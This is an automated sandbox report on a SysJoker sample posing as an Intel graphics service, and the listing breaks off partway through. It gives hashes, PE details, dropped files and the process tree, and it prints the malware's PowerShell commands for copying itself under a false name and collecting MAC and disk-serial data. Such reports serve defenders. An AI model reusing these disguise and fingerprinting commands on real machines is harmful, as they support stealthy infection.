                          https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537euigfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmpfalse
                            		high

                            Contacted IPs

                            No contacted IP infos

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:1708662
                            Start date:12.01.2022
                            Start time:14:10:56
                            Joe Sandbox Product:Cloud
                            Overall analysis duration:0h 9m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:qtjRj8L3Rw (renamed file extension from none to exe)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10x64 version 1803 (IE 11.1, Chrome 67, Firefox 61, Adobe Reader DC 18, Java 8 Update 171)
                            Number of analysed new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal88.troj.evad.winEXE@16/11@0/0
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 0.1% (good quality ratio 0.1%)
                            • Quality average: 53%
                            • Quality standard deviation: 0%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, WMIADAP.exe, WmiPrvSE.exe
                            • Excluded domains from analysis (whitelisted): go.microsoft.com, fs.microsoft.com, login.live.com, clientconfig.passport.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Signature Similarity

                            Sample Distance (10 = nearest)
                            10 9 8 7 6 5 4 3 2 1
                            Samplename Analysis ID SHA256 Similarity

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            14:13:07API Interceptor7x Sleep call for process: qtjRj8L3Rw.exe modified
                            14:13:52API Interceptor49x Sleep call for process: powershell.exe modified
                            14:13:54API Interceptor9x Sleep call for process: igfxCUIService.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            C:\ProgramData\SystemData\igfxCUIService.exe#SysJoker_n2.exeGet hashmaliciousBrowse
                              IGFXCUISERVICE.EXEGet hashmaliciousBrowse

                                Created / dropped Files

                                C:\ProgramData\SystemData\igfxCUIService.exe
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):401920
                                Entropy (8bit):6.560987668019584
                                Encrypted:false
                                SSDEEP:12288:m00VdXicNHeft0d/BiqpD9JD9lusIhAzhM2RdM:mrzXiu+FZqp72iDc
                                MD5:D90D0F4D6DAD402B5D025987030CC87C
                                SHA1:FAD66BDF5C5DC2C050CBC574832C6995DBA086A0
                                SHA-256:1FFD6559D21470C40DCF9236DA51E5823D7AD58C93502279871C3FE7718C901C
                                SHA-512:C2FAEACFD588585633630AD710F443A72C7617C2D5E37DBFE43570E6AC5904E4B81EB682356A48A93BB794EF5E9D8AD0D673966D57798079B4DE62EA61241024
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: C:\ProgramData\SystemData\igfxCUIService.exe, Author: Joe Security
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Joe Sandbox View:
                                • Filename: #SysJoker_n2.exe, Detection: malicious, Browse
                                • Filename: IGFXCUISERVICE.EXE, Detection: malicious, Browse
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@......................@...N.......N.....N.........................g.....g.R...g.....Rich............................PE..L...b*1a.............................M............@..........................`............@.....................................x............................ ...8.....................................@............................................text.............................. ..`.rdata...?.......@..................@..@.data....!..........................@....rsrc...............................@..@.reloc...8... ...:..................@..B................................................................................................................................................................................................................................................................................................
                                C:\ProgramData\SystemData\igfxCUIService.exe:Zone.Identifier
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: [ZoneTransfer]....ZoneId=0
                                C:\ProgramData\SystemData\temps1.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):242
                                Entropy (8bit):3.744262078789027
                                Encrypted:false
                                SSDEEP:3:mSGg0W/FLyzdAFFFFm8xY/5hAVML6tdRRdnp+thONq:Cg0G5ym/m8GAD6Gs
                                MD5:1F9136F65D689B583097B6F38788B536
                                SHA1:B35D5EA6C7CBC73037F90E3009F00F72883E1B96
                                SHA-256:41970814664E728B105B6AE07244D39DFE036D8F56D55BD7D6AB99EBAF6C276F
                                SHA-512:D1352021E2797C860FCAD87271F9FF5C9E706C077810B94FC323FF691ECE4AA50DC2CAFD7EAB94D242F01E18281E6E249C4C991B0B78E811BED2A832CE760679
                                Malicious:false
                                Preview: ..Physical Address Transport Name ..=================== ==========================================================..5C-22-C6-13-4E-F9 \Device\Tcpip_{B8652DFC-E1F5-449D-BAE4-BFF4128DE918} ..
                                C:\ProgramData\SystemData\temps2.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):79
                                Entropy (8bit):3.433465716504146
                                Encrypted:false
                                SSDEEP:3:qXVFZycUbEcF75r:7cUg07F
                                MD5:836F27CBBDF1E1D7A6CFAD4B3B017854
                                SHA1:1D8FA7E3DF507FF69E27BCC7A1E9AF9B5EEC0917
                                SHA-256:3914DD947B9DDD2B833C6984A27BECAF10C4E0A025CB5D95A7F972285E920BC7
                                SHA-512:29B7481318CD869C00F6A9C16011436971B8B0B2BCF557A48FFB5F762386E470CE1547EF5C23C6C89477C36BAAB1ED307ABB6BE98ED4521B3F94F506E29DFC26
                                Malicious:false
                                Preview: SerialNumber ....VBc9b17e68-05a2fbcb .... ........
                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20928
                                Entropy (8bit):5.736673923217396
                                Encrypted:false
                                SSDEEP:384:OEDMvl7kLYyB3r/KKnYCP9qm8u0NRsevi6qoRs7CBr4xRRy3r:DLbG109qlsI2F4r
                                MD5:62FBD2028BA46AB5C9929FEBE0DDDF1E
                                SHA1:6D8A34C9F7D20F88A141F607F9520A2C9B9118C3
                                SHA-256:C772F93662B1EDD867A4C12DE354E195B8FDBB3E07EDF809F5DFD1022D4E544F
                                SHA-512:F8816986B1DAE6B0C49E2F8EF74B8ECDC6427E8DB15BBB9E921442BE8965DD0B85D3A702730DDAD0EA1D35C4754E3C6972A81E0D45D9308D49F7DD172C5DCF14
                                Malicious:false
                                Preview: @...e...........X.......a...............|.?..........@..........0...............G-.o...A...4B..&.......System..H.................]....E..Jqp...)..... .Microsoft.PowerShell.ConsoleHostD................N..o.H...1.w.........System.Management.Automation4.................A:.(.D...............System.Core.4................Zg5..:O..g..q..u.......System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4.................5...KG..)....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cmkzftm.ckp.psm1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):80
                                Entropy (8bit):4.481774803623838
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFKOMHiQEon:SnqbKAKWGKMoo
                                MD5:527CB6C3BC5154A156D0EA016483A34C
                                SHA1:04D2802479D325F6E5D615A612769C916BE2DF23
                                SHA-256:8E7B2AA8B3DC0007DA4C75608D4199A6780C09982862661114F172E68DCE21B4
                                SHA-512:B3A4F81BD514C68E607BF1B65CFF3DC58A05C68ADFF8F5F6878B6012579E7EA1D122E1E0C6C1DB420B6BB7A749D9DCA27159E24E798549AFC6744A7159557AF9
                                Malicious:false
                                Preview: # PowerShell test file to determine AppLocker lockdown mode 1/12/2022 2:14:51 PM
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmv4hq3u.jjj.ps1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):80
                                Entropy (8bit):4.522338709846795
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFKOMHRTFi:SnqbKAKWGKMxTFi
                                MD5:C5634FF893F8A8DED82722075C1C3C2C
                                SHA1:3DF424425568D6CC0F3A88BBAB90CA721FC20C44
                                SHA-256:3D94B8F90F9750B62BB00F6648B1AD327C8CA96101C270EAE53AFB10EF4F14E5
                                SHA-512:980A3C99D53268A247A7E2D42B7BCDE8D83AA03253696E10BCCB21AB7BEA2E28184744A3174893B35BDFB6274BF5D96A973D5FBB6E8C9BB5B96F551B3B02B6C4
                                Malicious:false
                                Preview: # PowerShell test file to determine AppLocker lockdown mode 1/12/2022 2:13:46 PM
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltcvmphj.tyt.ps1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):80
                                Entropy (8bit):4.481774803623838
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFKOMHiQEon:SnqbKAKWGKMoo
                                MD5:527CB6C3BC5154A156D0EA016483A34C
                                SHA1:04D2802479D325F6E5D615A612769C916BE2DF23
                                SHA-256:8E7B2AA8B3DC0007DA4C75608D4199A6780C09982862661114F172E68DCE21B4
                                SHA-512:B3A4F81BD514C68E607BF1B65CFF3DC58A05C68ADFF8F5F6878B6012579E7EA1D122E1E0C6C1DB420B6BB7A749D9DCA27159E24E798549AFC6744A7159557AF9
                                Malicious:false
                                Preview: # PowerShell test file to determine AppLocker lockdown mode 1/12/2022 2:14:51 PM
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxtcgyim.deb.psm1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):80
                                Entropy (8bit):4.522338709846795
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFKOMHRTFi:SnqbKAKWGKMxTFi
                                MD5:C5634FF893F8A8DED82722075C1C3C2C
                                SHA1:3DF424425568D6CC0F3A88BBAB90CA721FC20C44
                                SHA-256:3D94B8F90F9750B62BB00F6648B1AD327C8CA96101C270EAE53AFB10EF4F14E5
                                SHA-512:980A3C99D53268A247A7E2D42B7BCDE8D83AA03253696E10BCCB21AB7BEA2E28184744A3174893B35BDFB6274BF5D96A973D5FBB6E8C9BB5B96F551B3B02B6C4
                                Malicious:false
                                Preview: # PowerShell test file to determine AppLocker lockdown mode 1/12/2022 2:13:46 PM
                                C:\Users\user\Documents\20220112\PowerShell_transcript.305090.U78yw9TH.20220112141320.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1097
                                Entropy (8bit):5.231490561673135
                                Encrypted:false
                                SSDEEP:24:BxSAq3Tvi3x/nx2DOXUW8UEaW70jeuKK6X4CIym1ZJXzEKFnxSAZixC:BZiTvqxfoOnEd7CKYB1ZlEKZZZixC
                                MD5:8365D33CCC4CEA6DC81FBEF8074AB171
                                SHA1:C496EBFC5BE5A922E538C1C207DE9537FC81EDFE
                                SHA-256:8E8C6AF2C3F6FAE12DC730B90E24EB44DA5AD7A6C1A18C1BC3D5D207049A5FC5
                                SHA-512:31ED3800A7991A213F31B09A51DDF72CC8FA5E2B22572CF2E7125F817DA5416C172BC73C08BEFDE2E19A65E4D8DB8A3E36AE0A3437CA2FD2BF6E616CB2F8F6DA
                                Malicious:false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20220112141348..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'..Process ID: 5848..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220112141348..**********************..PS>copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'..**********************..Command start time: 20220112141450..**********************..PS>$global:?..True..************
                                C:\Users\user\Documents\20220112\PowerShell_transcript.305090.zOvb_cEe.20220112141411.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1303
                                Entropy (8bit):5.259294238407679
                                Encrypted:false
                                SSDEEP:24:BxSA2G3Tvi3x/nx2DOXUWKYcdVWF0jeuKK6X4CIym1ZJXuyYcAmnxSAZNC:BZ2uTvqxfoOqYceFCKYB1ZsyYcAoZZNC
                                MD5:2BFD640543E531BDDD9BA1D7E839BE11
                                SHA1:00E520EC469EB47BAFD0F44CD2E73BEE529F2B79
                                SHA-256:F564AEE3F53BFCBE099DF22A14C20001FE353D0C73FE1E5B2916D2EDDE4454B7
                                SHA-512:1F92D6FDB177003A430D190232474458B932A24F890246604E7996B5982DBFBD4A7FF2DE0CBF420770F1FAB2F57938BDA6F48A34B14128F9486135CDF0B9D049
                                Malicious:false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20220112141453..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'..Process ID: 5312..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220112141453..**********************..PS>getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedi

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.560987668019584
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:qtjRj8L3Rw.exe
                                File size:401920
                                MD5:d90d0f4d6dad402b5d025987030cc87c
                                SHA1:fad66bdf5c5dc2c050cbc574832c6995dba086a0
                                SHA256:1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c
                                SHA512:c2faeacfd588585633630ad710f443a72c7617c2d5e37dbfe43570e6ac5904e4b81eb682356a48a93bb794ef5e9d8ad0d673966d57798079b4de62ea61241024
                                SSDEEP:12288:m00VdXicNHeft0d/BiqpD9JD9lusIhAzhM2RdM:mrzXiu+FZqp72iDc
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@........................@...N.......N.......N...............................g.......g.R.....g.......Rich...................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x424dcb
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x61312A62 [Thu Sep 2 19:47:46 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:86f89939b4b0c19157649ce986ae170e

                                Entrypoint Preview

                                Instruction
                                call 00007FF3F0B3277Fh
                                jmp 00007FF3F0B320DFh
                                push ebp
                                mov ebp, esp
                                sub esp, 00000324h
                                push ebx
                                push 00000017h
                                call 00007FF3F0B53284h
                                test eax, eax
                                je 00007FF3F0B32267h
                                mov ecx, dword ptr [ebp+08h]
                                int 29h
                                push 00000003h
                                call 00007FF3F0B32439h
                                mov dword ptr [esp], 000002CCh
                                lea eax, dword ptr [ebp-00000324h]
                                push 00000000h
                                push eax
                                call 00007FF3F0B3461Ah
                                add esp, 0Ch
                                mov dword ptr [ebp-00000274h], eax
                                mov dword ptr [ebp-00000278h], ecx
                                mov dword ptr [ebp-0000027Ch], edx
                                mov dword ptr [ebp-00000280h], ebx
                                mov dword ptr [ebp-00000284h], esi
                                mov dword ptr [ebp-00000288h], edi
                                mov word ptr [ebp-0000025Ch], ss
                                mov word ptr [ebp-00000268h], cs
                                mov word ptr [ebp-0000028Ch], ds
                                mov word ptr [ebp-00000290h], es
                                mov word ptr [ebp-00000294h], fs
                                mov word ptr [ebp-00000298h], gs
                                pushfd
                                pop dword ptr [ebp-00000264h]
                                mov eax, dword ptr [ebp+04h]
                                mov dword ptr [ebp-0000026Ch], eax
                                lea eax, dword ptr [ebp+04h]
                                mov dword ptr [ebp-00000260h], eax
                                mov dword ptr [ebp-00000324h], 00010001h
                                mov eax, dword ptr [eax-04h]
                                push 00000050h
                                mov dword ptr [ebp-00000270h], eax
                                lea eax, dword ptr [ebp-58h]
                                push 00000000h
                                push eax
                                call 00007FF3F0B34590h

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5d4bc0x78.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x3b8.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000x38d4.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x585d00x1c.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x586c00x18.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x585f00x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x4a0000x1dc.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x48ddb0x48e00False0.509323408019data6.57262184076IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rdata0x4a0000x13f900x14000False0.460668945313data5.42470846624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x5e0000x21d00x1200False0.26953125data3.95317799649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc0x610000x3b80x400False0.4111328125data3.18893503216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x620000x38d40x3a00False0.670999461207data6.52552513001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0x610600x354dataEnglishUnited States

                                Imports

                                DLLImport
                                KERNEL32.dllCreateDirectoryW, SizeofResource, HeapFree, GetModuleFileNameW, InitializeCriticalSectionEx, WaitForSingleObject, HeapSize, MultiByteToWideChar, Sleep, GetLastError, LockResource, DeleteFileW, GlobalFree, HeapReAlloc, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, DecodePointer, HeapDestroy, DeleteCriticalSection, GetProcessHeap, WideCharToMultiByte, SleepEx, WriteConsoleW, CreateFileW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, ReadConsoleW, ReadFile, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, SetFilePointerEx, CloseHandle, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, EncodePointer, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, OutputDebugStringW, RtlUnwind, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetFileSizeEx, SetEndOfFile
                                SHELL32.dllShellExecuteW, ShellExecuteExW
                                ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                                OLEAUT32.dllSysAllocStringLen
                                WINHTTP.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpGetProxyForUrl, WinHttpWriteData, WinHttpReadData, WinHttpSetTimeouts, WinHttpCloseHandle, WinHttpCrackUrl, WinHttpQueryDataAvailable, WinHttpQueryHeaders, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpSetOption, WinHttpConnect, WinHttpReceiveResponse, WinHttpOpenRequest, WinHttpSendRequest

                                Version Infos

                                DescriptionData
                                LegalCopyrightCopyright 2012-2015, Intel Corporation
                                InternalNameIGFXCUISERVICE
                                FileVersion6.15.10.5063
                                CompanyNameIntel Corporation
                                ProductNameIntel(R) Common User Interface
                                ProductVersion6.15.10.5063
                                FileDescriptionigfxCUIService Module
                                OriginalFilenameIGFXCUISERVICE.EXE
                                Translation0x0409 0x04b0

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                No network behavior found

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: qtjRj8L3Rw.exe PID: 5732 Parent PID: 5072

                                General

                                Start time:14:13:06
                                Start date:12/01/2022
                                Path:C:\Users\user\Desktop\qtjRj8L3Rw.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\qtjRj8L3Rw.exe"
                                Imagebase:0xbd0000
                                File size:401920 bytes
                                MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: 00000000.00000000.532048911.0000000000C1A000.00000002.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp, Author: Joe Security
                                Reputation:low

                                Chronological Activities

                                Analysis Process: powershell.exe PID: 5848 Parent PID: 5732

                                General

                                Start time:14:13:09
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                                Imagebase:0xb0000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 5868 Parent PID: 5848

                                General

                                Start time:14:13:09
                                Start date:12/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff658540000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: igfxCUIService.exe PID: 4384 Parent PID: 5732

                                General

                                Start time:14:13:54
                                Start date:12/01/2022
                                Path:C:\ProgramData\SystemData\igfxCUIService.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\ProgramData\SystemData\igfxCUIService.exe"
                                Imagebase:0xd10000
                                File size:401920 bytes
                                MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: 00000007.00000000.643724739.0000000000D5A000.00000002.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: C:\ProgramData\SystemData\igfxCUIService.exe, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                Reputation:low

                                Chronological Activities

                                Analysis Process: powershell.exe PID: 5312 Parent PID: 4384

                                General

                                Start time:14:13:56
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                                Imagebase:0xb0000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 4564 Parent PID: 5312

                                General

                                Start time:14:13:56
                                Start date:12/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff658540000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: getmac.exe PID: 3328 Parent PID: 5312

                                General

                                Start time:14:15:01
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\getmac.exe
